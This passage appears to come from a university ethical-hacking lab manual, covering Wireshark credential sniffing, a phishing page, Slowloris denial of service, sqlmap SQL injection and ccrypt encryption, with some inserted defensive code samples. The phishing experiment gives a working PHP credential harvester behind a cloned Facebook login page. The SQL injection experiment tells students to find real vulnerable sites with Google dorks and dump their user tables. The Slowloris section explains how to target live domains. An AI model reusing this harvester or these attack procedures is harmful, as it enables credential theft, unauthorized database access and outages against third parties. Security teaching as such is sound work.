information to discover valuable information such as user IDs and passwords.

Network sniffing is the process of capturing data packets sent over a network. This can
be done by a specialized software program or by hardware equipment. Sniffing can be used to:

 Capture sensitive data such as login credentials
 Eavesdrop on chat messages
 Capture files that have been transmitted over a network

The following protocols are vulnerable to sniffing:

 Telnet
 Rlogin
 HTTP
 SMTP
 NNTP
 POP
 FTP
 IMAP

The above protocols are vulnerable if login details are sent in plain text.

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting,
analysis, software and communications protocol development, and education. Wireshark is
cross-platform, using the Qt widget toolkit in current releases to implement its user interface,
and using pcap to capture packets; it runs on Linux, macOS, BSD, Solaris, some other
Unix-like operating systems, and Microsoft Windows. There is also a terminal-based
(non-GUI) version called TShark. Wireshark is used to capture and analyse packets in a
network. It is also used as a sniffer, network protocol analyzer, and network analyzer. We can
also apply a specific filter on network traffic to get more filtered data packets.

Color Coding:

Different packets are seen highlighted in different colors. This is Wireshark’s way of
displaying traffic to help you easily identify the types of traffic. Default colors are:

 Light Purple color for TCP traffic
 Light Blue color for UDP traffic
 Black color identifies packets with errors, for example packets that are delivered out of
order.

To check the color coding rules, click on View and select Coloring Rules. These color-coding
rules can be customized and modified to fit your needs.

Procedure:

Step1: Open the terminal in Kali Linux and type wireshark and hit enter to open the tool.

Step2: Select eth0 and click on the Start capturing packets icon. It will start capturing.

Step3: Now start any browser and open this webpage http://testphp.vulnweb.com/login.php.

Step4: Enter Username and Password and click on the login button.

Step5: Now get back to the Wireshark tool and click on the Stop capturing packets icon.

Step6: Now type http.request.method == "POST" in the display filter bar and hit enter.

Step7: Click on HTML Form URL Encoded. We can see the previously entered Username
and Password here.
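Added example (not from the lab manual): the same check Step6 and Step7 do by hand, as detection code a defender could run over captured TCP payloads. It keeps only POST requests, parses the URL-encoded form and reports credential-like fields that crossed the wire in the clear. The request bytes are a constructed sample modelled on the lab's login page, not a real capture.

```python
from urllib.parse import parse_qs

# Constructed sample of what Wireshark shows under "HTML Form URL Encoded"
# for the lab's login POST (made-up credentials, not a real capture).
SAMPLE_REQUEST = (
    b"POST /login.php HTTP/1.1\r\n"
    b"Host: testphp.vulnweb.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 25\r\n"
    b"\r\n"
    b"uname=test&pass=s3cret%21"
)

# Field-name fragments that usually carry secrets (assumed list).
SENSITIVE_FIELDS = ("pass", "password", "passwd", "pwd", "secret", "token")


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into method, path, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", len(body)))
    return {"method": method, "path": path, "headers": headers, "body": body[:length]}


def cleartext_credentials(raw: bytes, tls: bool = False) -> list:
    """Return (field, value) pairs of credential-like form fields sent in the
    clear. Mirrors the lab's filter http.request.method == "POST" and then
    looks inside the urlencoded form; traffic carried over TLS is skipped,
    since a sniffer would only see ciphertext there."""
    if tls:
        return []
    req = parse_http_request(raw)
    ctype = req["headers"].get("content-type", "")
    if req["method"] != "POST" or not ctype.startswith("application/x-www-form-urlencoded"):
        return []
    form = parse_qs(req["body"].decode("utf-8", "replace"))
    found = []
    for field, values in form.items():
        if any(marker in field.lower() for marker in SENSITIVE_FIELDS):
            found.extend((field, v) for v in values)
    return found
```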

Viva Questions:

1. What is Wireshark?

2. What is the main purpose of Wireshark?

3. What is Network sniffing?

4. What are the default colors in Wireshark?


Experiment No. 9
Aim: Create a social networking website login page using the phishing techniques.

Lab Objectives: To know how to create social media login page for phishing attacks.

Lab Requirements: Xampp Server, VS Code and Firefox Browser.

Theory: Phishing is a form of social engineering where attackers deceive people into
revealing sensitive information or installing malware such as ransomware. Phishing attacks
have become increasingly sophisticated and often transparently mirror the site being targeted,
allowing the attacker to observe everything while the victim is navigating the site, and to
traverse any additional security boundaries with the victim.

Types of Phishing:

 Email Phishing: In an email phishing scam, the attacker sends an email that looks
legitimate, designed to trick the recipient into entering information in reply or on a
site that the hacker can use to steal or sell their data.
 Spear Phishing: Spear phishing involves targeting a specific individual in an
organization to try to steal their login credentials. The attacker often first gathers
information about the person before starting the attack, such as their name, position,
and contact details.
 Angler Phishing: Anglers use fake social media posts to get people to provide login
info or download malware.
 Smishing: Smishing is phishing through some form of a text message or SMS.
 Vishing: Vishing, which is short for "voice phishing," is when someone uses the
phone to try to steal information. The attacker may pretend to be a trusted friend or
relative or to represent them.
 HTTPS Phishing: An HTTPS phishing attack is carried out by sending the victim an
email with a link to a fake website. The site may then be used to fool the victim into
entering their private information.
 Pop-up Phishing: Pop-up phishing often uses a pop-up about a problem with your
computer’s security or some other issue to trick you into clicking. You are then
directed to download a file, which ends up being malware, or to call what is supposed
to be a support center.
 Pharming: In a pharming attack, the victim gets malicious code installed on their
computer. This code then sends the victim to a fake website designed to gather their
login credentials.
 Evil Twin Phishing: In an evil twin attack, the hacker sets up a false Wi-Fi network
that looks real. If someone logs in to it and enters sensitive details, the hacker captures
their info.
 Watering Hole Phishing: In a watering hole phishing attack, a hacker figures out a
site a group of users tends to visit. They then use it to infect the users’ computers in
an attempt to penetrate the network.
 Whaling: A whaling attack is a phishing attack that targets a senior executive. These
individuals often have deep access to sensitive areas of the network, so a successful
attack can result in access to valuable info.
 Clone Phishing: A clone phishing attack involves a hacker making an identical copy
of a message the recipient already received. They may include something like
“resending this” and put a malicious link in the email.
 Website Spoofing: With website spoofing, a hacker creates a fake website that looks
legitimate. When you use the site to log in to an account, your info is collected by the
attacker.
 Domain Spoofing: Domain spoofing, also referred to as DNS spoofing, is when a
hacker imitates the domain of a company—either using email or a fake website—to
lure people into entering sensitive information. To prevent domain spoofing, you
should double-check the source of every link and email.
 Deceptive Phishing: Deceptive phishers use deceptive technology to pretend they are
with a real company to inform the targets they are already experiencing a cyberattack.
The users then click on a malicious link, infecting their computer.
 Image Phishing: Image phishing uses images with malicious files in them meant to
help a hacker steal your account info or infect your computer.
 Search Engine Phishing: A search engine phishing attack involves an attacker
making fake products that look attractive. When these pop up in a search engine, the
target is asked to enter sensitive information before purchasing, which then goes to a
hacker.

Procedure:
Step1: First open any one social media website’s login page and copy the source code and
save it in the name of index.html. (In our case it is Facebook login page).

Step2: Create an empty text (log.txt) file. This file helps us to save credentials.

Step3: Create a php file in the name of post.php, to connect html file with the text file and to
redirect to the original website.

Post.php

<?php
// Set the location to redirect the page
header('Location: http://www.facebook.com');

// Open the text file in append mode
$file = fopen("log.txt", "a");

foreach ($_POST as $variable => $value) {
    fwrite($file, $variable);
    fwrite($file, "=");
    fwrite($file, $value);
    fwrite($file, "\r\n");
}
fwrite($file, "\r\n");
fclose($file);

exit;
?>

Step4: Replace the action attribute value with post.php and keep the id attribute value
empty in the form tag of the index.html file.

Ex: action="post.php" and id=""

Note: Save these three files in one folder (phishing) and save the folder in the Xampp’s
htdocs folder.

Step5: Start Xampp and open the folder in localhost using any browser.

Step6: Enter Email address or phone number and Password and click on Log in. It will
redirect to the original Facebook login page. (You can check it in the URL section. Both are
different URLs. One is localhost and the other is the actual Facebook URL.)

Step7: Open log.txt file to see credentials.


Viva Questions:

1. What is phishing?

2. What is whaling?

3. What is smishing?

4. What is website spoofing?

5. What is deceptive phishing?


Experiment No. 10
Aim: Perform DDOS attack using the Slowloris tool.

Lab Objectives: To know how HTTP Denial of Service attack affects threaded servers.

Lab Requirements: Kali Linux and GitHub.

Theory: Slowloris is a free and open-source tool available on GitHub. We can perform a
denial-of-service attack using this tool. It is a framework written in Python. This tool allows a
single machine to take down another machine’s web server using perfectly legitimate HTTP
traffic. It makes a full TCP connection and then requires only a few hundred requests at long-
term and regular intervals. As a result, the tool doesn’t need to spend a lot of traffic to
exhaust the available connections on a server.

Uses of Slowloris:

 Slowloris sends multiple requests to the target and, as a result, generates heavy
botnet-like traffic.
 Slowloris can be used to perform DDoS attacks on any webserver.
 It is an open-source tool, so you can download it from GitHub free of cost.
 It uses perfectly legitimate HTTP traffic.
 A denial-of-service attack can be executed with the help of Slowloris by generating
heavy botnet-like traffic.

Procedure:

Step1: Open Kali Linux and then open the Terminal. Create a new directory on desktop
named Slowloris and Move to that directory using the following commands.

cd Desktop

mkdir Slowloris

cd Slowloris

Step2: Now we have to clone the Slowloris tool from GitHub in the same directory using the
following command.

git clone https://github.com/gkbrk/slowloris.git

Step3: Now go to the Action bar and click on split terminal vertically; we will see that two
terminal screens are now open.

Step4: Now we have to check the IP address of our Kali machine. To do that, type the
following command in the right-side terminal.

ifconfig

Step5: Now it’s time to start the apache server. Start the apache server using the following
command in the right-side terminal.

service apache2 start


Step6: Now we have to check the status of our server whether it is active or not so to check
the status of our server run the following command in the right-side terminal.

service apache2 status

Step7: We can see that our server is in active status, which means it is running properly. To
check permissions, run the following commands in the left-side terminal.

cd slowloris

ls -l

Step8: Now it’s time to run the tool using the following command in the left-side terminal.

python3 slowloris.py <our IP address> -s 500

Step9: We can see that the tool has started attacking the IP address we gave it. To check
whether it is working, go to any browser and type that IP address in the URL bar; we will
see “Problem loading page”. This is how the Slowloris tool works.

Note: Here the browser keeps waiting for the server and is not able to load the page,
because the denial-of-service attack is happening behind the browser using the Slowloris
tool. If we want to attack a live website, we can give the domain name of that website to
the Slowloris tool instead of the IP address of the system, and Slowloris will start attacking
that particular domain; however, that is a crime, and we do not promote such activity. This
experiment is only for educational purposes.
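Added example (not from the lab manual): what the attack looks like from the server side, and a detection rule for it. The theory above says Slowloris holds full TCP connections open with partial requests, so a defender watching the connection table looks for one source holding many long-lived connections that never complete their headers (the lab runs it with -s 500 sockets). The connection records are a constructed snapshot, and the thresholds are assumptions to tune per server.

```python
from collections import defaultdict

# Constructed snapshot of a threaded web server's connection table, one
# record per open connection: (source IP, seconds open, request complete?).
# Real servers expose similar data on their status pages; values are made up.
CONNECTIONS = [
    ("10.0.0.5", 3.2, True),
    ("10.0.0.5", 1.1, True),
    ("192.168.56.101", 45.0, False),
    ("192.168.56.101", 47.3, False),
    ("192.168.56.101", 52.8, False),
    ("192.168.56.101", 61.0, False),
    ("192.168.56.101", 30.5, False),
    ("10.0.0.9", 40.0, False),
]


def slowloris_suspects(connections, min_age=20.0, min_conns=5):
    """Flag sources holding at least min_conns connections open for at least
    min_age seconds without ever completing the request headers. A normal
    client sends its headers within a fraction of a second; a Slowloris
    client deliberately never does, so each stalled socket pins one worker."""
    stalled = defaultdict(int)
    for src, age, complete in connections:
        if not complete and age >= min_age:
            stalled[src] += 1
    return {src: n for src, n in stalled.items() if n >= min_conns}


def worker_exhaustion(connections, max_workers):
    """Fraction of the server's worker slots currently held by incomplete
    requests; as this approaches 1.0 the browser in Step9 stops loading."""
    stalled = sum(1 for _, _, complete in connections if not complete)
    return stalled / max_workers
```

A server-side mitigation with the same logic is a header read timeout, which closes connections whose headers do not arrive within a bounded time.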

Viva Questions:

1. What is Slowloris tool?

2. From where we clone the slowloris tool?

3. What are the uses of slowloris tool?


Experiment No. 11
Aim: Perform SQL injection attack using the SQLmap tool.

Lab Objectives: The objective of this lab is to help students learn how to perform a SQL
injection and extract databases.

Lab Requirements: Kali Linux and Any browser.

Theory: SQL injection (SQLi) is a cyberattack that injects malicious SQL code into an
application, allowing the attacker to view or modify a database. SQL injection attacks can
have a significant negative impact on an organization. When a malicious user successfully
completes an SQL injection attack, it can have any of the following impacts:

 Exposes sensitive company data: Using SQL injection, attackers can retrieve and
alter data, which risks exposing sensitive company data stored on the SQL server.
 Compromise users’ privacy: Depending on the data stored on the SQL server, an
attack can expose private user data, such as credit card numbers.
 Give an attacker administrative access to our system: If a database user has
administrative privileges, an attacker can gain access to the system using malicious
code. To protect against this kind of vulnerability, create a database user with the least
possible privileges.
 Give an attacker general access to our system: If we use weak SQL commands to
check user names and passwords, an attacker could gain access to our system without
knowing a user’s credentials. With general access to our system, an attacker can cause
additional damage accessing and manipulating sensitive information.
 Compromise the integrity of our data: Using SQL injection, attackers can make
changes to or delete information from our system.

SQL injection attacks fall into three categories: In-band SQL injection, Inferential SQL
injection and Out-of-band SQL injection.

1. In-band (Classic) SQL Injection:

In-band SQL injection is the most common type of attack. With this type of SQL injection
attack, a malicious user uses the same communication channel for the attack and to gather
results. The following techniques are the most common types of in-band SQL injection
attacks:

 Error-based SQL injection: With this technique, attackers gain information about
the database structure when they use a SQL command to generate an error message
from the database server. Error messages are useful when developing a web
application or web page, but they can be a vulnerability later because they expose
information about the database. To prevent this vulnerability, we can disable error
messages after a website or application is live.
 Union-based SQL injection: With this technique, attackers use the UNION SQL
operator to combine multiple select statements and return a single HTTP response. An
attacker can use this technique to extract information from the database. This
technique is the most common type of SQL injection and requires more security
measures to combat than error-based SQL injection.

2. Inferential (Blind) SQL Injection:

Inferential SQL injection is also called blind SQL injection because the website database
doesn’t transfer data to the attacker like with in-band SQL injection. Instead, a malicious user
can learn about the structure of the server by sending data payloads and observing the
response. Inferential SQL injection attacks are less common than in-band SQL injection
attacks because they can take longer to complete. The two types of inferential SQL injection
attacks use the following techniques:

 Boolean injection: With this technique, attackers send a SQL query to the database
and observe the result. Attackers can infer if a result is true or false based on whether
the information in the HTTP response was modified.
 Time-based injection: With this technique, attackers send a SQL query to the
database, making the database wait a specific number of seconds before responding.
Attackers can determine if the result is true or false based on the number of seconds
that elapses before a response. For example, a hacker could use a SQL query that
commands a delay if the first letter of the first database’s name is A. Then, if the
response is delayed, the attacker knows the query is true.

3. Out-of-Band SQL Injection:

Out-of-band SQL injection is the least common type of attack. With this type of SQL
injection attack, malicious users use a different communication channel for the attack than
they use to gather results. Attackers use this method if a server is too slow or unstable to use
inferential SQL injection or in-band SQL injection.
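Added example (not code from the lab manual): the "weak SQL commands to check user names and passwords" from the theory above, shown as a string-built login query beside its parameterised fix, on a constructed in-memory SQLite table. The vulnerable version accepts a password of ' OR '1'='1 for any user because the quote rewrites the WHERE clause; the bound version treats the same text as a literal value. error_message_leak shows the error-based case: the raw database error that concatenation surfaces, which the application should log rather than return.

```python
import sqlite3


def make_db():
    """In-memory users table with one constructed account (not real data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (u_name TEXT, u_password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    return db


def login_vulnerable(db, user, password):
    """String-built query: user-controlled text becomes part of the SQL
    statement, so a quote in the input changes the statement's logic.
    With password ' OR '1'='1 the WHERE clause becomes
    (u_name = ? AND u_password = '') OR '1'='1', which is always true."""
    sql = (f"SELECT COUNT(*) FROM users WHERE u_name = '{user}' "
           f"AND u_password = '{password}'")
    return db.execute(sql).fetchone()[0] > 0


def login_safe(db, user, password):
    """Parameterised query: the driver binds the values, so they are never
    parsed as SQL and a quote is just a character in the password."""
    sql = "SELECT COUNT(*) FROM users WHERE u_name = ? AND u_password = ?"
    return db.execute(sql, (user, password)).fetchone()[0] > 0


def error_message_leak(db, user):
    """Error-based SQL injection: a stray quote in the input makes the
    concatenated statement fail to parse, and the database error text
    tells an attacker the input is reaching the parser. Returns the error
    text (what a page with error messages enabled would display), or None."""
    try:
        db.execute(f"SELECT u_name FROM users WHERE u_name = '{user}'")
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)
```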

Procedure:

Step1: Open the Terminal and move to the root user using the following command.

sudo su (enter password as kali)

Step2: Open any browser and search for vulnerable websites using the following dork.

inurl:"php?id=your target area" or inurl:"material.php?id="

Step3: In the terminal window type sqlmap -u URL --dbs and hit the enter button. This query
will retrieve the database information. ( Note: Select http sites only)

Step4: Now, we need to choose a database and retrieve the tables in the database. Type
sqlmap -u URL DBName --tables (or) sqlmap -u URL -D DBName --tables and hit the enter
button. ( Wait for the results).

Step5: Now, we need to retrieve the columns associated with the tables. Type sqlmap -u
URL -D DBName -T TableName --columns and hit the enter button.

Step6: To get the information related to any column, type sqlmap -u URL -D DBName -T
TableName -C ColumnName --dump and hit enter. In this experiment we will retrieve
information from the u_login, u_name and u_password columns.

Viva Questions:

1. What is SQL injection (SQLi)?

2. What is In-band SQL Injection?

3. What is another name of In-band SQL Injection?

4. What are the types of In-band SQL Injection?

5. What are the types of Inferential (Blind) SQL Injection?

6. What is Out-of-Band SQL Injection?


Experiment No. 12
Aim: Practice encryption and decryption of text files using the Ccrypt tool.

Lab Objectives: The main objective of this lab is to know how to encrypt and decrypt text
files.

Lab Requirements: Kali Linux and Ccrypt tool.

Theory: Ccrypt is a command line tool for encryption and decryption of data. Ccrypt is based
on the Rijndael cipher, the same cipher used in the AES standard. Unlike the AES standard,
which uses a 128-bit block size, ccrypt uses a 256-bit block size. Ccrypt commonly uses the
.cpt file extension for encrypted files.

 It is a lightweight tool; the installation and use of this tool is pretty easy.
 It is designed to overcome the shortcomings of standard Unix crypt utility.

Download link: https://ccrypt.sourceforge.net/download/1.11/ccrypt-1.11.linux-x86_64.tar.gz

Ccrypt Manual:

 -e, --encrypt: Encrypt. This is the default mode. If filename arguments are given,
encrypt the files and append the suffix .cpt to their names. Otherwise, run as a filter.
 -d, --decrypt: Decrypt. If filename arguments are given, decrypt the files and strip the
suffix .cpt from the filenames, if present. Otherwise, run as a filter.
 -c, --cat: Decrypt one or more files to standard output. If no filename arguments are
given, decrypt as a filter. Implies -l.
 -x, --keychange: Change the key of encrypted data. In this mode, ccrypt prompts for
two passwords: the old one and the new one. If filename arguments are given, modify
the files. Otherwise, run as a filter.
 -u, --unixcrypt: Simulate the old Unix crypt command. Note: the cipher used by Unix
crypt has been broken and is not secure. Please use this option only to decrypt existing
files. If filename arguments are given, decrypt the files to stdout. Otherwise, run as a
filter. Note that for the Unix crypt format, there is no easy way to detect whether a
given key matches or not; thus, for safety, this mode does not overwrite files.

Procedure:

Step1: Open the Terminal window in the Kali Linux and install ccrypt tool.
sudo apt-get install ccrypt

Note: If needed update the Kali Linux packages (sudo apt-get update).

Step2: Now check the modes inside the ccrypt tool.

ccrypt -h

Step3: Now create a text file, enter some text and read it.

nano practice.txt ( ctrl+s to save the file and ctrl+x to exit from the editor)

cat practice.txt

Step4: To encrypt the text file, we need to enter the following command. Enter the
encryption key twice.

ccrypt -e practice.txt

Note: It will create a .cpt file (practice.txt.cpt) and remove the plaintext practice.txt.

Step5: Now try to read the file. It will show unreadable text, which means the encryption is
successful.

cat practice.txt.cpt

Step6: To decrypt the file, we need to enter the following command. Enter the decryption
key (the encryption and decryption keys are the same).

ccrypt -d practice.txt.cpt

Step7: Now try to read the text file again; it will show the text. This means the decryption is
successful.

cat practice.txt

Viva Questions:

1. What is encryption?

2. What is decryption?

3. What is the full form of AES?

4. What is cipher?
